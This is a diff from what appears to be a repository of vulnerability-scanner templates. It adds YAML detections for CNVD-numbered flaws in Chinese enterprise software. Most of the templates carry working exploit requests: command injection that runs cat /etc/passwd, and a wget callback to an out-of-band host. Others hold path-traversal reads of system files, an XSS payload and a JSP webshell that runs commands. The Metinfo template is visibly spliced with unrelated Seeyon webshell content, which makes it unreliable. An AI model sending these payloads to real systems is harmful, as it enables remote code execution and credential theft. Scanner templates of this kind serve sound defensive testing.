camunda | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| fatwire | 1 | | | | | | | | | +| admin | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | | jsp | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| solarview | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| console | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| hirak | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| supervisor | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| webmail | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| eyoucms | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| secret | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| leostream | 1 | | | | | | | | | +| guppy | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| blockchain | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| vms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| unifi | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| cassandra | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| veeam | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| aerohive | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| sucuri | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| ucs | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| h3c | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 389da75091..be73077a0e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | diff --git a/cnvd/2018/CNVD-2018-13393.yaml b/cnvd/2018/CNVD-2018-13393.yaml new file mode 100644 index 0000000000..0cce50c757 --- /dev/null +++ b/cnvd/2018/CNVD-2018-13393.yaml @@ -0,0 +1,25 @@ +id: CNVD-2018-13393 + +info: + name: Metinfo LFI + author: ritikchaddha + severity: high + reference: + - https://paper.seebug.org/676/ + tags: metinfo,cnvd,cvnd2018,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce + + - | + GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_1, "htmoffice operate")' + - 'contains(body_2, "Windows IP")' + condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2019/CNVD-2019-32204.yaml b/cnvd/2019/CNVD-2019-32204.yaml new file mode 100644 index 0000000000..ec365a5f8c --- /dev/null +++ b/cnvd/2019/CNVD-2019-32204.yaml @@ -0,0 +1,30 @@ +id: CNVD-2019-32204 + +info: + name: Fanwei e-cology <=9.0 - Remote Code Execution + author: daffainfo + severity: critical + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + reference: + - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: fanwei,cnvd,cnvd2019,rce + +requests: + - raw: + - | + POST /bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2020-23735.yaml b/cnvd/2020/CNVD-2020-23735.yaml similarity index 83% rename from cnvd/CNVD-2020-23735.yaml rename to cnvd/2020/CNVD-2020-23735.yaml index 88cf7d0df7..2a5823431c 100644 --- a/cnvd/CNVD-2020-23735.yaml +++ b/cnvd/2020/CNVD-2020-23735.yaml @@ -5,8 +5,9 @@ info: author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. - reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/2025171 + tags: xunchi,lfi,cnvd,cnvd2020 requests: - method: GET @@ -18,9 +19,10 @@ requests: - type: status status: - 200 + - type: word + part: body words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" - part: body - condition: and \ No newline at end of file + condition: and diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..02a98ac205 --- /dev/null +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -0,0 +1,33 @@ +id: CNVD-2020-46552 + +info: + name: Sangfor EDR - Remote Code Execution + author: ritikchaddha + severity: critical + description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sangfor,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + + matchers: + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'contains(body, "Log Helper")' + - 'status_code == 200' + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/cnvd/CNVD-2020-56167.yaml b/cnvd/2020/CNVD-2020-56167.yaml similarity index 83% rename from cnvd/CNVD-2020-56167.yaml rename to cnvd/2020/CNVD-2020-56167.yaml index 1fe06f6c1c..964ed36f40 100644 --- a/cnvd/CNVD-2020-56167.yaml +++ b/cnvd/2020/CNVD-2020-56167.yaml @@ -4,8 +4,9 @@ info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 + tags: ruijie,default-login,cnvd,cnvd2020 requests: - method: POST @@ -17,12 +18,11 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - "Level was: LEVEL15" - "/WEB_VMS/LEVEL15/" - part: body condition: and - type: status diff --git a/cnvd/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml similarity index 75% rename from cnvd/CNVD-2020-62422.yaml rename to cnvd/2020/CNVD-2020-62422.yaml index 736770f82c..0194c6d8b8 100644 --- a/cnvd/CNVD-2020-62422.yaml +++ b/cnvd/2020/CNVD-2020-62422.yaml @@ -1,11 +1,12 @@ id: CNVD-2020-62422 info: - name: Seeyon readfile(CNVD-2020-62422) + name: Seeyon - Arbitrary File Retrieval author: pikpikcu severity: medium - reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi,cnvd + reference: + - https://blog.csdn.net/m0_46257936/article/details/113150699 + tags: lfi,cnvd,cnvd2020,seeyon requests: - method: GET @@ -17,13 +18,15 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/x-msdownload" condition: and - part: header + - type: word + part: body words: - "ctpDataSource.password" condition: and - part: body \ No newline at end of file diff --git a/cnvd/2020/CNVD-2020-67113.yaml b/cnvd/2020/CNVD-2020-67113.yaml new file mode 100644 index 0000000000..547b8d305b --- /dev/null +++ b/cnvd/2020/CNVD-2020-67113.yaml @@ -0,0 +1,44 @@ +id: CNVD-2020-67113 + +info: + name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113) + author: ritikchaddha + severity: high + description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability + reference: + - https://vul.wangan.com/a/CNVD-2020-67113 + metadata: + shodan-query: http.title:"H5S CONSOLE" + tags: h5s,unauth,h5sconsole,cnvd,cnvd2020 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/GetSrc" + - "{{BaseURL}}/api/v1/GetDevice" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'strUser' + - 'strPasswd' + condition: and + + - type: word + part: body + words: + - 'H5_AUTO' + - 'H5_DEV' + condition: or + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/2020/CNVD-2020-68596.yaml similarity index 59% rename from cnvd/CNVD-2020-68596.yaml rename to cnvd/2020/CNVD-2020-68596.yaml index 56cd6901fd..b1d96de058 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/2020/CNVD-2020-68596.yaml @@ -1,11 +1,17 @@ id: CNVD-2020-68596 info: - name: WeiPHP 5.0 Path Traversal + name: WeiPHP 5.0 - Path Traversal author: pikpikcu - severity: critical - reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi,cnvd + description: WeiPHP 5.0 is susceptible to directory traversal attacks. + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: weiphp,lfi,cnvd,cnvd2020 requests: - raw: @@ -34,9 +40,11 @@ requests: matchers: - type: word + part: body words: - https://weiphp.cn - WeiPHP - DB_PREFIX condition: and - part: body \ No newline at end of file + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml new file mode 100644 index 0000000000..af7aa8ed08 --- /dev/null +++ b/cnvd/2021/CNVD-2021-01931.yaml @@ -0,0 +1,30 @@ +id: CNVD-2021-01931 + +info: + name: Ruoyi Management System - Arbitrary File Retrieval + author: daffainfo,ritikchaddha + severity: high + reference: + - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ + tags: ruoyi,lfi,cnvd,cnvd2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd" + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini" + + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml new file mode 100644 index 0000000000..528666e80d --- /dev/null +++ b/cnvd/2021/CNVD-2021-09650.yaml @@ -0,0 +1,32 @@ +id: CNVD-2021-09650 + +info: + name: Ruijie EWEB Gateway Platform - Remote Command Injection + author: daffainfo + severity: critical + description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. + reference: + - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: ruijie,cnvd,cnvd2021,rce + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php + Host: {{Hostname}} + + mac=1&ip=127.0.0.1|wget {{interactsh-url}} + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2021-10543.yaml b/cnvd/2021/CNVD-2021-10543.yaml similarity index 79% rename from cnvd/CNVD-2021-10543.yaml rename to cnvd/2021/CNVD-2021-10543.yaml index a29fe66f5a..8a4354683a 100644 --- a/cnvd/CNVD-2021-10543.yaml +++ b/cnvd/2021/CNVD-2021-10543.yaml @@ -4,8 +4,9 @@ info: name: EEA Information Disclosure author: pikpikcu severity: high - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 + tags: config,exposure,cnvd,cnvd2021 requests: - method: GET @@ -14,7 +15,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "(.*?)" diff --git a/cnvd/2021/CNVD-2021-14536.yaml b/cnvd/2021/CNVD-2021-14536.yaml new file mode 100644 index 0000000000..d68c5af401 --- /dev/null +++ b/cnvd/2021/CNVD-2021-14536.yaml @@ -0,0 +1,45 @@ +id: CNVD-2021-14536 + +info: + name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure + author: daffainfo + severity: high + description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information. + reference: + - https://www.adminxe.com/2163.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: title="RG-UAC登录页面" + tags: ruijie,cnvd,cnvd2021,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/get_dkey.php?user=admin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"pre_define"' + - '"auth_method"' + - '"name"' + - '"password"' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' + +# Enhanced by mp on 2022/03/28 diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/2021/CNVD-2021-15822.yaml similarity index 57% rename from cnvd/CNVD-2021-15822.yaml rename to cnvd/2021/CNVD-2021-15822.yaml index 83e4dc3d9d..02ff83b22e 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/2021/CNVD-2021-15822.yaml @@ -4,8 +4,13 @@ info: name: ShopXO Download File Read author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi + reference: + - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + metadata: + verified: true + shodan-query: title:"ShopXO企业级B2C电商系统提供商" + fofa-query: app="ShopXO企业级B2C电商系统提供商" + tags: shopxo,lfi,cnvd,cnvd2021 requests: - raw: @@ -16,11 +21,12 @@ requests: matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/cnvd/2021/CNVD-2021-15824.yaml b/cnvd/2021/CNVD-2021-15824.yaml new file mode 100644 index 0000000000..972a1b6064 --- /dev/null +++ b/cnvd/2021/CNVD-2021-15824.yaml @@ -0,0 +1,36 @@ +id: CNVD-2021-15824 + +info: + name: EmpireCMS DOM Cross Site-Scripting + author: daffainfo + severity: high + description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. + reference: + - https://sourceforge.net/projects/empirecms/ + - https://www.bilibili.com/read/cv10441910 + - https://vul.wangan.com/a/CNVD-2021-15824 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: empirecms,cnvd,cnvd2021,xss,domxss + +requests: + - method: GET + path: + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'if(Request("url")!=0)' + - 'href=\""+Request("url")+"\"' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cnvd/2021/CNVD-2021-17369.yaml b/cnvd/2021/CNVD-2021-17369.yaml new file mode 100644 index 0000000000..4a60de39cb --- /dev/null +++ b/cnvd/2021/CNVD-2021-17369.yaml @@ -0,0 +1,36 @@ +id: CNVD-2021-17369 + +info: + name: Ruijie Smartweb Management System Password Information Disclosure + author: pikpikcu + severity: high + description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ruijie,disclosure,cnvd,cnvd2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/web/xml/webuser-auth.xml" + headers: + Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cnvd/2021/CNVD-2021-26422.yaml b/cnvd/2021/CNVD-2021-26422.yaml new file mode 100644 index 0000000000..8ceb9e5c8d --- /dev/null +++ b/cnvd/2021/CNVD-2021-26422.yaml @@ -0,0 +1,36 @@ +id: CNVD-2021-26422 + +info: + name: eYouMail - 